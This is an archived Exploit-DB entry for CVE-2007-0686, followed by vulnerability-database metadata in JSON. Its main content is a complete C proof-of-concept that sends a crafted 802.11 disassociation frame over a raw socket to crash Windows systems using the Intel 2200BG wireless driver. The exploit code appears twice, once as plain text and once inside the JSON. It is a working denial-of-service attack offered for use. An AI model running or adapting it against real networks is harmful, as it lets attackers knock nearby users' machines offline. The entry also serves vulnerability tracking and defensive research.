ID EDB-ID:3224
Type exploitdb
Reporter Breno Silva Pinto
Modified 2007-01-29T00:00:00
Description
Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption. CVE-2007-0686. Dos exploit for windows platform
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)
This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)
Proof Of Concept:
*/
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// 28 bytes disassociation packet.
char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal
0x00, 0x00, // Duration ID
0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
0x00, 0x00, // Frag. Number
0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code
int main() {
struct sockaddr_ll link;
struct ifreq iface;
int s;
char packet[sizeof(d)];
int len = 0;
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
return 0;
bzero(&iface,sizeof(iface));
bzero(&link,sizeof(link));
bzero(packet,sizeof(d));
strcpy(iface.ifr_name,"ath0raw");
if(ioctl(s,SIOCGIFHWADDR, &iface)) {
return 0;
}
if(ioctl(s,SIOCGIFINDEX, &iface)) {
return -1;
}
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
return -1;
}
link.sll_family = AF_PACKET;
link.sll_ifindex = iface.ifr_ifindex;
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
return -1;
}
memcpy(packet,d,sizeof(d));
len = sendto(s,packet,sizeof(d), 0, NULL, 0);
usleep(5000);
printf("%d bytes enviados\n",len);
close(s);
return 0;
}
// milw0rm.com [2007-01-29]
{"id": "EDB-ID:3224", "hash": "a41349941ad86af2d8a4f6bbd9895c9a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption", "description": "Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption. CVE-2007-0686. Dos exploit for windows platform", "published": "2007-01-29T00:00:00", "modified": "2007-01-29T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/3224/", "reporter": "Breno Silva Pinto", "references": [], "cvelist": ["CVE-2007-0686"], "lastseen": "2016-01-31T18:00:20", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2016-01-31T18:00:20"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0686"]}, {"type": "osvdb", "idList": ["OSVDB:37996"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6475"]}], "modified": "2016-01-31T18:00:20"}, "vulnersScore": 5.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3224/", "sourceData": "/*\r\nTitle: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption\r\n\r\nDescription: The intel wireless mini-pci driver provided with Intel\r\n/*\r\nTitle: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption\r\n\r\nDescription: The intel wireless mini-pci driver provided with Intel\r\n2200BG cards is vulnerable to a remote memory corruption flaw.\r\nMalformed disassociation packets can be used to corrupt internal kernel\r\nstructures, causing a denial of service (BSOD)\r\n\r\nThis vulnerability was found at Intel 2200 driver version 9.0.3.9\r\n(09/12/2005).\r\n\r\nDriver files:\r\n\r\nw29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725\r\nw29mlres.dll 35afeccc4092b69f62d757c4707c74e9\r\nw29NCPA.dll 980f58b157baedc23026dd9302406bdd\r\n\r\nAuthor: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)\r\n\r\n\r\nProof Of Concept:\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <asm/types.h>\r\n#include <linux/if.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/if_ether.h>\r\n#include <linux/if_arp.h>\r\n#include <netinet/in.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n// 28 bytes disassociation packet.\r\n\r\nchar d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal\r\n 0x00, 0x00, // Duration ID\r\n 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr\r\n 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr\r\n 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id\r\n 0x00, 0x00, // Frag. Number\r\n 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code\r\n\r\nint main() {\r\n struct sockaddr_ll link;\r\n struct ifreq iface;\r\n int s;\r\n char packet[sizeof(d)];\r\n int len = 0;\r\n\r\n if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)\r\n return 0;\r\n\r\n bzero(&iface,sizeof(iface));\r\n bzero(&link,sizeof(link));\r\n bzero(packet,sizeof(d));\r\n\r\n strcpy(iface.ifr_name,\"ath0raw\");\r\n\r\n if(ioctl(s,SIOCGIFHWADDR, &iface)) {\r\n return 0;\r\n }\r\n\r\n if(ioctl(s,SIOCGIFINDEX, &iface)) {\r\n return -1;\r\n }\r\n\r\n if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {\r\n return -1;\r\n }\r\n\r\n link.sll_family = AF_PACKET;\r\n link.sll_ifindex = iface.ifr_ifindex;\r\n\r\n if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {\r\n return -1;\r\n }\r\n\r\n memcpy(packet,d,sizeof(d));\r\n len = sendto(s,packet,sizeof(d), 0, NULL, 0);\r\n usleep(5000);\r\n printf(\"%d bytes enviados\\n\",len);\r\n\r\n close(s);\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2007-01-29]\r\n", "osvdbidlist": ["37996"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "The Intel 2200BG 802.11 Wireless Mini-PCI driver 9.0.3.9 (w29n51.sys) allows remote attackers to cause a denial of service (system crash) via crafted disassociation packets, which triggers memory corruption of \"internal kernel structures,\" a different vulnerability than CVE-2006-6651. NOTE: this issue might overlap CVE-2006-3992.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-0686", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0686", "published": "2007-02-03T01:28:00", "title": "CVE-2007-0686", "type": "cve", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nGeneric Exploit URL: http://milw0rm.com/exploits/3224\n[CVE-2007-0686](https://vulners.com/cve/CVE-2007-0686)\n", "modified": "2007-01-29T16:02:52", "published": "2007-01-29T16:02:52", "href": "https://vulners.com/osvdb/OSVDB:37996", "id": "OSVDB:37996", "title": "Intel 2200BG 802.11 Wireless Mini-PCI (w29n51.sys) Crafted Disassociation Packets Remote DoS", "type": "osvdb", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "Multiple vulnerabilities, including local privilege escalation anre remote code execution.", "modified": "2006-09-22T00:00:00", "published": "2006-09-22T00:00:00", "id": "SECURITYVULNS:VULN:6475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6475", "title": "Multiple Intel Centrino / PROSet / Apple Airport wireless drivers security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}
